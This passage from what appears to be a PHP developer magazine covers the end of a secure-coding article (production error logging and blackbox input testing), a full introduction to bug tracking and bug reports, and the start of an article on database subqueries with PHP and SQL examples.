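// Production settings: keep collecting errors, but never print them.
function configureErrorsForProduction(string $logFile): void
{
    error_reporting(E_ALL);          // still record everything
    ini_set('display_errors', '0');  // do not send messages to the browser
    ini_set('log_errors', '1');      // write them to a log instead
    ini_set('error_log', $logFile);  // hypothetical log location
}

configureErrorsForProduction(sys_get_temp_dir() . '/app-errors.log');
```

With these settings a failed database connection or fopen() call still leaves a trace for the developer, but the host names and file paths no longer reach the attacker.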
Secure Coding Methodology

The key to coding secure web applications in PHP is to be aware of the potential flaws that your code may be vulnerable to, and to be attentive in preventing these flaws throughout the entire development process. Too often security is an afterthought or added feature. The most secure code is written with security in mind from the word ‘go’.

Testing Methodology

In blackbox testing, a security professional attempts to expose flaws in an application. The term ‘blackbox’ refers to the closed-source or proprietary application, and the process of manipulating known inputs and analyzing outputs from the application. In blackbox testing PHP code, the tester examines the application and identifies all of the expected GET and POST variables, including hidden and dynamically-generated variables. These variables are then manipulated using potentially “unexpected” values, such as special characters and type-mismatched or oversized requests. In most cases, the PHP application’s expected inputs can be identified by reading all available HTML source pages, and/or capturing and decoding valid requests. As an example, examine the following URI:

http://example.com/story.php?ID=33&title=Updates&lang=en

In the above example, the GET variables that should be manipulated and tested are ID, title and lang. As another example, examine the form in Listing 25. Here, the POST variables to be tested are ‘sid’, ‘listid’ and ‘usermail’. The tester inserts special characters into each of these inputs, and submits the request. Output is analyzed to determine if the application handled the input correctly, or if some unexpected error has occurred. Manipulated POST variables can be submitted using a command-line tool such as lynx or curl, or a copy of the form input page can be saved and modified locally. Manipulated GET variables can be submitted using a regular browser. Unexpected behavior may take the form of half-loaded or blank pages, or a redirect to a front page. If the application displays an error message, the tester can determine if it is vulnerable to any of the common PHP coding errors detailed in this article.

Conclusion

Web applications are, in security terms, a different ball game from conventional applications. The communication protocols, server-side application code and client-side presentation code combine to form a development environment in which bugs can make use of problems in various components of the technology simultaneously. To compound this problem, web technology was originally designed to handle the public dissemination of markup documents, not the development of secure applications. This is slowly being rectified, but the developer must remain alert to security concerns in order to produce secure applications. Hopefully what has been outlined above can assist in the creation of more secure web applications.
About the Author

David works as a document imaging and OCR programmer for a small Australian company. He spends his spare time writing PHP code and studying environmental science.

Discuss this article at http://forums.phparch.com/44
Introduction to Bug Management
FEATURE
by Dejan Bosanac
REQUIREMENTS
PHP: 4.0+
OS: N/A
Applications: N/A
Code Directory: N/A

What is a bug?

It all started in 1947 at Harvard University, while the Mark II Aiken Relay Calculator was being tested for a malfunction. A moth was found trapped between two electrical relays. Operators removed the moth and wrote in the log “First actual case of bug being found.” They said that they had “debugged” the machine, and the term “debugging a computer program” was introduced.

Anyone who has ever used any kind of software is familiar with the term “bug”. But before we proceed further with our story, we should make it clear what we mean by this term. The classic definition of a bug is an error in software code that causes the program to malfunction. We must be careful with this, however, because it is very closely related to the requirements of our project. We can’t tell that something is not working properly unless we know the desired behavior. Some users, for example, can interpret the lack of certain functionality as a bug. Because of this thin line between bugs and functionality, it is good practice to do request tracking along with the bug tracking process, as we will see later in the text. We will introduce a new term, issue, to describe both bugs and feature requests.

The layman would say that bugs in software are only the result of programmer carelessness, but anyone who has ever worked on a large software project knows that is not always true. Sometimes projects are so complicated that a minor change in one module can produce an unexpected disaster where it is least expected. There are many software techniques that show how to take your software’s quality to a higher level, but they are well beyond the scope of this article. Here, we will concentrate on how to keep track of the bugs (and requests) in your project. We will also learn how to organize the development process so that most of the malfunctions in the software code are detected before final release and not by your customers.

Life cycle of a bug

The first thing you will always hear when discussing software testing and quality assurance is that the person who implements the code should not be the person who tests it. There are a few reasons for this. The first is that the person who writes the code has his own mindset and cannot see certain flaws in the design even if he looks at it for a very long time. Another person, who is only looking at the code’s behaviour, can easily spot things that the original writer missed. The second argument is rather psychological: the tester should act destructively against the code, which is very hard to do with your own work. We won’t go deeper into the details of software testing, as that could be the topic of some future article, but this point is very important in establishing roles in our bug management process. Three roles are necessary for successful bug tracking:

• Developer – person who actually writes code and fixes bugs
• Tester (QA staff) – person who tests the code and writes bug reports. This person, as we will see later, also verifies that a given bug is fixed
• Project manager – person who assigns certain properties to bugs (as we are going to see in the next section) and assigns them to developers for fixing

Bug Life Cycle
1. QA submits bug report
2. Project manager reviews the bug report and assigns it if necessary
3. Developer fixes the bug
4. QA verifies that bug is fixed
5. Bug gets closed

The bug life cycle would look like this: a quality assurance person finds the bug and submits the bug report. The project manager reviews every bug report. If he finds that the bug is valid, he sets some attributes on the bug and assigns it to the appropriate developer. The developer then fixes the bug and assigns it to QA for verification. QA repeats the tests against the requirement and the bug gets closed or reopened depending on whether the problem is still present in the system.

Anatomy of a bug

Now is a good time to see what bug attributes we need in order to successfully track our bugs.

Components

Components help us to partition and decouple the whole project implementation and also make it easier to find who is in charge of a particular code base. You can divide the project vertically, by encapsulating all the code that solves the same problem domain (business logic) into a component (financial classes, address book and so on), or horizontally, by making components of the particular application layers. Or you could do both. There are no strict rules. You should find the scheme that best suits your needs. For example, we could introduce the following components for tracking bugs in the project:

• Presentation layer – all bugs that are related to the user interface such as HTML code, client side code (JavaScript), etc.
• Business layer – malfunctions in business scripts and classes
• Data access layer – bugs in Data Object classes, SQL queries, database wrappers and so on

So when QA reports the bug, the component attribute should point to a specific project subsystem in order to make it easier for the project manager to assign it later.

Owner

The owner is the person who is responsible for the bug at a given stage of the bug cycle. It could be a developer who is responsible for fixing the bug or a QA team member who should verify that a bug is really fixed. This way it is much easier for the project manager to see what bugs are currently unassigned and assign them appropriately.

Severity
Severity is another important bug attribute that tells us how serious our bug is. Some common values are:

• Stopper – this kind of bug stops either the client from using the software or further development (e.g. crashes, bugs in a database wrapper that prevent the whole project from connecting to the database, etc.)
• Critical – serious bug that causes heavy program malfunctions (e.g. a bug in a core library that causes other subsystems to become unstable)
• Major – ‘major’ bugs make our software unreliable and can cause serious damage to us or our clients (e.g. bad data calculation in some cases that makes the data unreliable)
• Normal – bugs that are not serious but are unpleasant for our clients (e.g. broken links in pages)
• Minor – small bugs that are not crucial for core program execution, but should be fixed in order to improve the quality of the product (e.g. a bad label for a form field)
• Enhancement – this is not a real bug, but a request for a new feature

Priority

Priority is the attribute that is assigned by the project manager and helps developers organize their tasks. It’s a common practice to have five priority levels, and the bugs with higher priorities should be fixed first.

Status

Status is directly connected with the bug life cycle. It tells us which stage of the bug cycle our bug is currently in. Some commonly used values are:

• New – bug has been reported, but not yet reviewed
• Assigned – bug has been reviewed by the project manager and assigned to a particular developer
• Fixed – bug has been fixed by the development team and has to be reviewed by QA
• Verified (Closed) – QA has verified that the bug has been fixed
• Reopened – QA has run tests against the bug that was marked as fixed, and some problems still remain, so it is sent back to development for further repair
• Duplicated – this bug has already been reported
• Won’t fix – these are so-called “known bugs” that are not going to be fixed in this development cycle, mostly because of the great risk involved in fixing the bug or the time required for that job
• Invalid – the problem that is reported is not a bug
• Works for me – the problem that has been reported couldn’t be reproduced, so it is put in the repository for later analysis

Subject

Every bug report should have a subject attribute for easier browsing and querying.

Milestone

The software development process is often divided into smaller iterations called milestones. We should keep track of the project milestone that a bug was reported against and the one for which it has to be fixed. We can demonstrate this by imagining that we have delivered version 1.2 of the project to the client and continued to work on the next release (1.3). We need a way to separate bugs that are reported against these two versions because they are often completely different code bases.
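The attributes covered so far, together with the status values listed above, can be pictured as a small record plus a table of allowed status changes. The sketch below is only an illustration: the array keys, the `$transitions` table and the `changeStatus()` helper are hypothetical names, the priority scale is an assumption, and the permitted transitions are one reading of the life cycle described earlier rather than a rule taken from any particular tool.

```php
<?php
// Allowed status changes, read off the life cycle described in the text.
$transitions = [
    'New'      => ['Assigned', 'Duplicated', "Won't fix", 'Invalid', 'Works for me'],
    'Assigned' => ['Fixed'],
    'Fixed'    => ['Verified', 'Reopened'],
    'Reopened' => ['Fixed'],
];

// A bug record carrying the attributes discussed so far.
$bug = [
    'component' => 'Data access layer',
    'owner'     => null,   // unassigned until the project manager reviews it
    'severity'  => 'Major',
    'priority'  => 2,      // assumed scale: 1 (highest) to 5 (lowest)
    'status'    => 'New',
    'subject'   => 'Wrong totals in monthly report',
    'milestone' => '1.2',
];

// Returns a copy of $bug with the new status, or throws if the change is not allowed.
function changeStatus(array $bug, string $newStatus, array $transitions): array
{
    $allowed = $transitions[$bug['status']] ?? [];
    if (!in_array($newStatus, $allowed, true)) {
        throw new InvalidArgumentException(
            "Cannot move bug from {$bug['status']} to $newStatus"
        );
    }
    $bug['status'] = $newStatus;
    return $bug;
}
```

A call such as `changeStatus($bug, 'Assigned', $transitions)` succeeds, while trying to jump straight from New to Verified raises an exception, which is the kind of workflow rule a tracking tool would normally enforce for you.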
Comments

Comments are a very important and useful attribute of the bug. We should always allow our team members to add an unlimited number of comments to the bug. Doing so will allow us to keep track of the communication and history of the bug. An initial comment for the bug could be a description of the problem that QA (or the client) has found in our software.

Attachment

In some development organizations only a very limited number of developers can commit changes to the code repository. In this case, the bug’s attachment attribute is used to add code patches that fix bugs. Attachments can also be used for many other purposes, such as screen shots, test cases and any material that helps to document the bug properly.

The bug attributes described above are just a small subset of the attributes commonly used in projects. You should, of course, adjust these attributes to the specifics of your individual project and process. Some additional attributes that can be useful to describe the bug are web browser (particularly interesting for web application development), URL of the page in which the bug appears, operating system (for platform-specific problems) and many, many more.

Now that we know how to define our bugs, we should mention the process of collecting new feature requests for our project. This process is sometimes very closely related to the bug management process. When we were talking about the bug severity attribute earlier, we said that a special value (Enhancement) could be used to separate a bug from a request for enhancement (RFE). Basically, a feature request can have a very similar structure to the bug report and, since many bug tracking tools support this functionality, it is natural (to some point) to keep track of enhancement requests in the same repository as bugs.

Bug reports

OK, we have now discussed some basic information about the structure and life cycle of bugs. This information, however, is not enough for a successful bug tracking process. In order to make your process efficient, the QA department needs to supply useful bug reports to the development team. The more information developers have to work on, the sooner the bug will be traced and fixed. When submitting a bug report, there are a few things to keep in mind.

First things first: a basic rule in any bug tracking process is to always try to repeat the bug before submitting the report. This is very important because some bugs occur only under very specific circumstances and environment settings. You must be sure that you know the specific environment variables and steps that lead to the malfunction that you are going to submit. Of course, some bugs are almost impossible to trace, but even then you should make it easier for the developer by pointing him to all of the things that failed to reproduce it. That way we can save some time by not duplicating effort, and it gives the development team certain clues about what the problem could be.

Let’s take a look now at what makes a good report. We can start by showing one bad example and go through it to see how to make it better. Let’s say that a report like this is submitted:

When I inserted some customer data and clicked on the “Save changes” button, an error page was displayed.
When a developer gets a message like this, the only thing he knows is that some problem exists in the process of adding a new customer. He can’t begin fixing the problem without contacting the person who submitted the report because he hasn’t a clue where to start. So, the usual questions end up being asked: What error was displayed? What data did you submit? On what page did the error occur? In 99% of cases, the submitter doesn’t remember all the details because it was a “century” ago, and we’re trapped in an infinite loop. But if we use another approach and submit a report like this, everything could be very different:

• Operating system: Windows XP
• Browser: Mozilla 1.3
• URL: http://someproject.someurl/1/customer_add.php
• Component: Address book
• Version: 1.0
• Subject: Add a new customer
• Brief description: submitting a new customer with regular data failed
• Steps:
  Log in
  Click the link to the address book
  Click “Add new customer” button
  Enter the data (see “data” section)
  Click “Save changes” button
• Data:
  Name: Dejan Bosanac
  Email: [email protected]
  Title: Software developer
  All other fields: empty (default)
• Expected results: The data is submitted to the database and the “view” page for the customer is displayed
• Actual results: Error page with a message “Error executing SQL query: phone_number field cannot be NULL”
• Conclusion: Problem is probably in bad JS validation for the phone number field under the Mozilla browser
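A report structured like the one above lends itself to a simple completeness check before it is accepted. The following is a sketch only; the field names and the `missingReportFields()` helper are made up for illustration and do not come from any specific bug-tracking tool.

```php
<?php
// Fields a submitter must fill in (hypothetical names mirroring the report above).
$requiredFields = ['subject', 'description', 'environment', 'steps', 'expected', 'actual'];

// Returns the names of required fields that are absent or empty in $report.
function missingReportFields(array $report, array $requiredFields): array
{
    $missing = [];
    foreach ($requiredFields as $field) {
        if (empty($report[$field])) {
            $missing[] = $field;
        }
    }
    return $missing;
}

// The vague report: only a description, nothing a developer can act on.
$badReport = ['description' => 'An error page was displayed.'];

// The detailed report, reduced to the fields checked here.
$goodReport = [
    'subject'     => 'Add a new customer',
    'description' => 'Submitting a new customer with regular data failed',
    'environment' => 'Windows XP, Mozilla 1.3',
    'steps'       => ['Log in', 'Click the link to the address book',
                      'Click "Add new customer"', 'Enter the data', 'Click "Save changes"'],
    'expected'    => 'Customer is saved and the "view" page is displayed',
    'actual'      => 'Error executing SQL query: phone_number field cannot be NULL',
];
```

Calling `missingReportFields($badReport, $requiredFields)` lists everything the submitter still has to supply, which gives the questions a developer would otherwise have to ask by hand.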
With a detailed report like this, the developer could spot the problem in a moment and fix it. Most of the fields (attributes) in this report have been described in the basic bug anatomy, so it is likely that your bug-tracking solution will support them. All the specific data of the problem should be added as a comment or an attachment to the bug. We can now summarize what a good report should consist of:

1. Brief description of the problem
2. Environment under which the problem occurs
3. Steps needed to reproduce the problem
4. Specific inputs that caused the problem
5. Expected and actual results
6. Summary of what the problem could be

Of course, the details of each step depend on what the specific problem is. For example, if the bug is found during unit testing, the input data should be the test case that caused the bug (you can attach the test class that caused the bug, if you want). Or, at the other extreme, if it is a visual (cosmetic) bug, all you have to submit is how to reach the specific page and what is wrong (environment-specific data is always useful). A general rule is that the more complex the problem is, the more information the developer is going to need.

Bug tracking and development cycles

For successful bug and request tracking there are a few more issues that you must keep in mind. The development cycle plays a key role in how the process is handled. It can be divided into three phases:

• Development – implementation of the system functionality, resulting in huge changes to the code base
• Code freeze – software has entered the beta testing phase and code is usually frozen
• Release planning – preparations for the next project release are under way

In order to have an efficient development process, we will look at how to use the bug-tracking system in each of these phases.

In the development phase, good practice dictates that developers create test cases at the same time they write the code. A test case is code that is written to test certain functionality and to report an error if one is found. This way, we actually have confirmation that the software is doing the job for which it is meant. These test cases are normally grouped in a test suite that is executed regularly (preferably every night). This type of testing is called regression testing. We will not go into it in this article, but it is important to mention because it affects the bug tracking process itself. Some authors say that in this stage of development we should not use a bug-tracking system as a repository for bug issues, as our test suite keeps this information for us. They would advise, though, using a bug-tracking system for storing features that will be introduced later in the process. While this may be true to some point, some errors cannot be detected with regression testing. Defects that are found during code reviews, user experience issues, and visual defects are just some of the bugs that we must handle outside of a test suite. So, my opinion is that in this phase we shouldn’t duplicate in the system the failures that the test suite already reports, but all the other issues that are reported during testing should be stored. If we don’t do this, we can easily forget about them until it is too late. Of course, if you don’t have automated testing in your process, you should keep all the issues this way. Feature requests are always worth storing in the system for later analysis.
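To make the idea of a test case and a test suite more concrete, here is a minimal sketch that uses no testing framework. The function under test (`formatPhone()`) and the `runTests()` helper are hypothetical and exist only for this example; a real project would more likely rely on an established unit-testing library.

```php
<?php
// Hypothetical function under test: strips everything but digits from a phone number.
function formatPhone(string $input): string
{
    return preg_replace('/\D+/', '', $input);
}

// Runs each named test case and returns the names of those that failed.
function runTests(array $cases): array
{
    $failed = [];
    foreach ($cases as $name => $case) {
        if ($case() !== true) {
            $failed[] = $name;
        }
    }
    return $failed;
}

// A tiny test suite: each entry is one test case returning true on success.
$failed = runTests([
    'digits are kept'         => function () { return formatPhone('555 1234') === '5551234'; },
    'punctuation is removed'  => function () { return formatPhone('(011) 555-1234') === '0115551234'; },
    'empty input stays empty' => function () { return formatPhone('') === ''; },
]);

// An empty list means the suite passed; anything else is a candidate bug report.
echo $failed ? 'FAILED: ' . implode(', ', $failed) : 'all tests passed', "\n";
```

Run nightly, a script of this shape gives the regression check described above: a change that breaks `formatPhone()` shows up as a named failure rather than as a customer complaint.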
In the code freeze (beta testing) phase, the code is usually frozen and no immediate changes can be made. Now, we should keep track of all malfunctions found so that they can be fixed before the final release. It is also convenient to keep track of users’ feature requests (beta testers are usually potential future users). At this point, we should introduce a request “grade”. In other words, we should keep track of how many requests we have for each feature, so we can easily separate the must-have features from the eccentric ones.

When you are ready to start planning the next release, you can use the information stored in your tracking system. According to the request grade you can decide what features will become part of the next release. One more thing is important in this stage: you must estimate the effort needed to implement certain features. For example, if a feature is a must-have and it requires minor code changes, then it should definitely be planned for the next release. Where implementing a feature requires huge code refactoring and involves great risk, you should think about delaying it to some future release. When you have specifications for future releases, you should build the test cases for them and mark those requests as closed (remove them from the system).

Bug tracking tools

To start implementing organized bug management in your organization, you do not strictly need dedicated bug-tracking software. You could use a well-defined sheet in Excel-like software. You will soon see, however, that it would be much more efficient if you had just a little more. Many companies decide to build their own solutions, often seriously underestimating the effort for such a task. Many start with no clear idea of what they really want or need, and start coding a solution with minimal requirements. Soon after, they realize that maintenance and improvements to the solution are not cost effective by any means, and that the costs of later porting to some commercial solution are much higher than they would have been at the start. Even if you have a small budget, it is not really hard to find a free solution among today’s open source software. Many of these solutions will save you enormous time and manpower compared to building your own. That way, your developers can focus on building the project that needs the bug tracking process and not the tool itself. So, let’s start talking about what the defect-tracking tool needs to provide you.

How to choose the right tool for you?
Before starting your search for a bug-tracking tool, you should have a clear vision of your bug tracking process so you can choose the tool that will have all the necessary requirements to meet your needs. Let’s divide the requirements into two basic groups: business requirements and technical requirements. Business requirements First of all, you should fit the tool into your current company profile and budget. There are various systems on the market with a wide price range, so you should start by positioning yourself into a group
23
FEATURES
Introduction to Bug Management
that you can currently afford. If your budget is small, don’t worry, there are many very nice opensource solutions. There are also companies that allow you to outsource this service to them for a reasonable amount. Second, you should know who the users of the bug management system will be, and if they have any specific needs. You will also need to be aware of how many users will be using the system, as well as their locations. The price of the bug management tool is often related to this information. You can divide users into two large groups. Internal users • QA staff will submit and query reports to find bugs that need to be verified • Developers will query reports to find assigned tasks • Project manager will query reports to find unassigned bugs, and also run metrics on the data External users • Customers • Clients • Beta Testers External users may like to submit enhancement requests or bugs, and see the progress and status of certain issues. In this case, you will probably be searching for a tool that can be exposed to the web for external (and, of course, internal) users. This leads us to the question of security. Does the potential tool allow the creation of groups of users, as well as the separation of their privileges on actions and data? We might want to only allow external users to query a small subset of all issues (for example, only those that they have entered), and allow them only to submit new reports, but not allow them to modify existing data. We could, of course, enable only some groups to submit reports, but I think that it would be better to allow all users to submit, as fewer bugs will be missed that way. We could also expect that only project management staff could change details such as severity and priority. All of these decisions are up to you. Usability of the system is another important parameter. Does the potential tool define the bug workflow that you need? Could it be configured? 
Does the bug submission form have all of the attributes that you need? Could it be configured? It is very important for the tool to be easy to use, as that will minimize the resistance to the tool by team members that may jeopardize the whole process. You should also consider whether the tool
supports various methods of notification when a bug status changes. Does the software send email or SMS messages, or offer any other advanced notification techniques? You may want the project manager to be immediately notified when a new critical bug report arrives, or you could enable your customers to be alerted when a certain bug is fixed.

Administration concerns are the last issue that we will mention for the business requirements. We should know whether we have someone with the skills needed for successful deployment, configuration, and maintenance of the system, and how much time this will take away from their regular duties. If this is a problem, then employing another person for this task must be considered. The administration of the bug management tool is usually the responsibility of project and network/database administrators.

Technical requirements

Technical requirements for defect tracking software are basically the same as for all other software products.
• Reliability – software is stable and takes care of data consistency
• Robustness – software behaves well in extreme conditions and large data volumes
• Programmability – software has an application programming interface (API) through which it can be extended to your particular needs
• Security – software gives needed security for the data and has no security flaws that can be easily exploited
• Supportability – software vendor gives fair technical support for their product
• Scalability – software is adaptable to your particular needs

These are just basic technical concerns. You should also consider your current environment and skills. For example, does the product support database servers that you are comfortable with (MySQL, Sybase, Oracle, etc.)? Does the server code (in client/server and web-based solutions) suit your current development environment (Linux, Windows 2000, …), or will you need to prepare a new server for it?
There are many factors to consider when choosing the perfect solution. One final tip: you should actually try every solution that seems suitable, since you won’t necessarily find the flaws just by reading the product specification.
Some popular solutions

As I said before, many software packages are built for this specific need. We will mention two common ones; the further hunt is up to you.

• Bugzilla (http://www.mozilla.org/projects/bugzilla/) – this product has its genesis in the open source Mozilla web browser. It was written in Perl to replace an older bug tracking system used internally at Netscape Communications. It quickly became the de facto standard in the open source community, so you can see it in action on many projects on the web. Unix-like environments are natural for this software, and it is very well integrated with MySQL (but that’s the only database server that is currently supported). The source code comes under a mix of various licence policies that include the Netscape Public License (NPL), the Mozilla Public License (MPL), the GNU General Public License (GPL) and the GNU Lesser General Public License (LGPL).

Some features worthy of note:
– Integrated, product-based granular security schema
– Inter-bug dependencies and dependency graphing
– Advanced reporting capabilities
– A robust, stable RDBMS back-end
– Extensive configurability
– A very well-understood and well-thought-out natural bug resolution protocol
– Email, XML, console, and HTTP APIs
– Available integration with automated software configuration management systems, including Perforce and CVS (through the Bugzilla email interface and checkin/checkout scripts)

There are also some drawbacks that will be addressed in the future:
– Reliance on a single database server (MySQL)
– Rough user interface
– Spartan email notification templates
– Little report configurability
– Some unsupported bug statuses
– Little support for internationalisation
– Dependence on some non-standard libraries
• Elementool (http://elementool.com) – It is possible these days to outsource your bug tracking to some other company. It is very convenient in situations when you don’t have, or can’t afford, more time and resources for the solution. All you need is a few minutes to set up your account using your web browser, and you are ready to start. Also, this is an ideal solution for one-off projects because you can cancel your account at any time with no obligations. With this approach you don’t have any concerns regarding installing and updating your software, since you will always have the latest version ready for use.

Their basic free package includes:
– 200 issue storage capacity
– Unlimited number of users
– Mail notifications
– Downloadable database for your own backup
For extra features like reports, history trail, customisable forms and so on, you must register for an advanced, commercial package.
These are just representatives of two approaches; you should really spend some more time to find the perfect solution for your needs.

Closing word

The aim of every professional software package is a satisfied customer. If you have an organized process for tracking bugs and feature requests in your project, you can be sure that fewer bugs will be detected by customers, and that the time cycle needed to fix those bugs (and track down new requirements) will be noticeably shorter. There are many tools available on the market that could help you organize your defects and requirements, but, before you start tracking them, be sure that you know what you need. Bug tracking is closely related to quality assurance issues and team organization, so it is important to start from there. Just try it; it’s easier than it sounds.

About the Author
Dejan Bosanac works as a full-time software developer for DNS Europe Ltd (http://www.dnseurope.net) on the billing software system for ISPs. In his spare time he also serves as a Lead Engineer at Noumenaut Software (http://www.noumenaut.com) on the online journaling project. He holds a Bachelor’s degree in Computer Science and is currently pursuing a master’s degree in the same field.
Click HERE To Discuss This Article http://forums.phparch.com/45
Advanced Database Features Exposed
F E A T U R E
by Davor Pleskina
Databases have ceased to be a mystery. Designing and setting up databases and database-driven applications is no longer a terribly complicated task handled successfully only by specialists and technicians. Behind almost every site that consists of more than a product brochure is some kind of database from which information is retrieved and presented.

Although most web applications do not require highly advanced database servers, some of these servers provide more advanced features – such as subqueries, referential integrity, transaction handling, and support for stored procedures and triggers – which can make a developer’s life far easier. We will examine these features from a higher level, giving examples of their use and usefulness, as well as showing how some of them can be simulated at a low level within PHP.

Perhaps you have heard of some of these features, and maybe even used some of them. This article’s intent is to lower the bar for the uninitiated, and hopefully show you a right tool or two for the job. I mean, there is no sense trying to develop a semi-usable transaction handling system in PHP (which would be a difficult task indeed), when you could just use a database with transaction support built-in, right?

As much as possible, I’ll try to avoid database-specific code. To that end, the PHP examples use the PEAR DB class. PEAR (the PHP Extension and Application Repository) is a free online PHP software repository, and can be found at http://pear.php.net. PEAR is usually installed automatically when you install PHP using common install packages.

In all examples, we will assume that we are already connected to a database server, and that we already have a database connection handle which we are going to call $dbh. There will also be no error messages
specific to any RDBMS. As for requisite knowledge, we’ll assume a basic understanding of SQL, and go from there.

Some Data

We are going to need some real world tables and relationships to simulate situations in which our advanced database features become necessary. Suppose we have two small tables, one containing data about our customers, and the other containing their addresses (we might expect a customer to have more than one address). These tables are going to contain a very small number of columns, and we will not specify data types. Here are the table structures we’ll work with:

CUSTOMER table:
CUSTOMER_ID
FIRST_NAME
LAST_NAME
GENDER
ADDITIONAL_INFO
LAST_CHANGE
REQUIREMENTS PHP: 4.0+ OS: N/A Applications: N/A Code Directory: advanced_db
ADDRESS table:
ADDRESS_ID
CUSTOMER_ID
STREET
CITY
POSTAL_CODE
STATE
COUNTRY
LAST_CHANGE
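If you would like to experiment with these two tables, the following is a minimal sketch of how they might be created. It is not taken from the article: it uses PDO with an in-memory SQLite database in place of the PEAR DB handle $dbh so that it can run on its own (this needs PHP 5.1 or later with the pdo_sqlite extension), and the column types and sample rows are assumptions, since the article deliberately leaves data types unspecified.

```php
<?php
// Sketch only: PDO with in-memory SQLite stands in for the article's PEAR DB
// handle. Column types and sample data are assumptions.
$dbh = new PDO('sqlite::memory:');
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// One row per customer; CUSTOMER_ID is the primary key.
$dbh->exec('CREATE TABLE CUSTOMER (
    CUSTOMER_ID     INTEGER PRIMARY KEY,
    FIRST_NAME      TEXT,
    LAST_NAME       TEXT,
    GENDER          TEXT,
    ADDITIONAL_INFO TEXT,
    LAST_CHANGE     TEXT
)');

// Several rows per customer are allowed; CUSTOMER_ID refers back to CUSTOMER.
$dbh->exec('CREATE TABLE ADDRESS (
    ADDRESS_ID  INTEGER PRIMARY KEY,
    CUSTOMER_ID INTEGER NOT NULL,
    STREET      TEXT,
    CITY        TEXT,
    POSTAL_CODE TEXT,
    STATE       TEXT,
    COUNTRY     TEXT,
    LAST_CHANGE TEXT
)');

// Hypothetical sample data: one customer with two addresses.
$dbh->exec("INSERT INTO CUSTOMER (CUSTOMER_ID, FIRST_NAME, LAST_NAME) VALUES (1, 'Ann', 'Example')");
$dbh->exec("INSERT INTO ADDRESS (ADDRESS_ID, CUSTOMER_ID, CITY) VALUES (1, 1, 'Zagreb')");
$dbh->exec("INSERT INTO ADDRESS (ADDRESS_ID, CUSTOMER_ID, CITY) VALUES (2, 1, 'Split')");

// Count the addresses stored for customer 1.
$addressCount = (int) $dbh->query('SELECT COUNT(*) FROM ADDRESS WHERE CUSTOMER_ID = 1')->fetchColumn();
echo "Customer 1 has $addressCount addresses\n";
```

Nothing in this sketch enforces the link between ADDRESS.CUSTOMER_ID and CUSTOMER.CUSTOMER_ID; it only records it by convention.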
It may be apparent that CUSTOMER_ID is going to be our customer’s unique identification number, as well as that table’s primary key. Other information that we will store about the customer includes first and last name, gender, and any desired additional info. The last column in the CUSTOMER table represents the date of the last change made to a specific customer’s information.

The ADDRESS table can hold more than one address for a single customer. The unique identifier and primary key for each address is stored in a column named ADDRESS_ID. This table must also contain a reference to the appropriate customer, and this is found in the CUSTOMER_ID column. Specific address data is also stored, including the street, city, postal code, state and country columns, while the last column again holds information about when the specific record last changed.

Subqueries

You can think of subqueries (or sub-SELECTs) as SELECTs within other SELECTs. A simple example could look like:

SELECT something
FROM table_1
WHERE something IN (
    SELECT something_else
    FROM table_2
    WHERE something_else LIKE 'more conditions'
)...

Let’s look at a demonstration of the importance and use of subqueries. Consider that from time to time we want to remove customers who do not have any addresses in our database. To do that without subqueries would require a number of steps. We would need to browse the CUSTOMER table record-by-record checking for matching records in the ADDRESS table, deleting the customers with none. An example of doing this with PHP is shown in Listing 1.

Listing 1

// NOTE: the opening lines of this listing are missing from this copy. The three
// query strings and the loop header are reconstructed from the variable names
// used in the surviving lines below, and should be read as assumptions.
$query_customers       = "SELECT CUSTOMER_ID FROM CUSTOMER";
$query_check_address   = "SELECT COUNT(*) AS CNT_ADDRESS FROM ADDRESS WHERE CUSTOMER_ID = ";
$query_delete_customer = "DELETE FROM CUSTOMER WHERE CUSTOMER_ID = ";
$customers = $dbh->query($query_customers);
while ($row_customer = $customers->fetchRow(DB_FETCHMODE_ASSOC)) {
    // Get customer ID
    $customer_id = $row_customer['CUSTOMER_ID'];
    // Count addresses
    $result = $dbh->query($query_check_address . "'$customer_id'");
    $row = $result->fetchRow(DB_FETCHMODE_ASSOC);
    // Get number of addresses
    $count = $row['CNT_ADDRESS'];
    if ($count < 1) {
        // No addresses, delete the customer
        $dbh->query($query_delete_customer . "'$customer_id'");
    }
}

Using a subquery, we could do all of this in one step with the following statement:

DELETE FROM CUSTOMER
WHERE NOT EXISTS (
    SELECT CUSTOMER_ID
    FROM ADDRESS
    WHERE CUSTOMER.CUSTOMER_ID = ADDRESS.CUSTOMER_ID
)

As you can see, the subquery will perform a small join on CUSTOMER and ADDRESS. If the subquery doesn’t return a row for a particular customer, it means that there are no addresses for that customer in the ADDRESS table, and the customer can be deleted. That is a lot of work done in a single statement! The statement could also have been written using the IN operator, like this:

DELETE FROM CUSTOMER
WHERE CUSTOMER_ID NOT IN (
    SELECT CUSTOMER_ID
    FROM ADDRESS
)
This is a different approach to doing the same job, but it returns and checks more data for each customer, which is not recommended when the tables involved store a large amount of data. In such cases, EXISTS is a more suitable operator.

If your applications use very complex SQL statements to retrieve data, you can also simplify them, and avoid joining too many related tables, by using subqueries to retrieve a single data column from related tables. Note the following two statements, which return the same count for every customer that has at least one address (the join leaves out customers with no addresses, while the subquery version lists them with a count of 0):

SELECT CUSTOMER.CUSTOMER_ID,
       COUNT(ADDRESS.ADDRESS_ID) AS NO_OF_ADDRESSES
FROM CUSTOMER, ADDRESS
WHERE CUSTOMER.CUSTOMER_ID = ADDRESS.CUSTOMER_ID
GROUP BY CUSTOMER.CUSTOMER_ID

SELECT CUSTOMER.CUSTOMER_ID,
       (SELECT COUNT(*)
        FROM ADDRESS
        WHERE CUSTOMER.CUSTOMER_ID = ADDRESS.CUSTOMER_ID) AS NO_OF_ADDRESSES
FROM CUSTOMER
In both cases, the customer’s ID and count of related addresses is returned; however, in the first statement we had to group data using the GROUP BY clause, which is in most cases a slow operation on large tables. In the second statement, we executed a small, quick subquery (it is quick because it retrieves only related data from the ADDRESS table for each customer and counts it using the table’s primary keys), thereby avoiding joining and grouping.

Although, at first sight, the second statement looks more complex than the first one, think what it would look like if we had to join and group more than two tables with many fields: many field names would appear in the WHERE and GROUP BY clauses, and the SELECT list would look much more complicated. Field name conflicts could also appear, and we would be forced to prefix each field that appears more than once with its table name. We should also mention that all field names in a subquery are local to that statement, and we do not need to worry about conflicts with field names in the main statement.
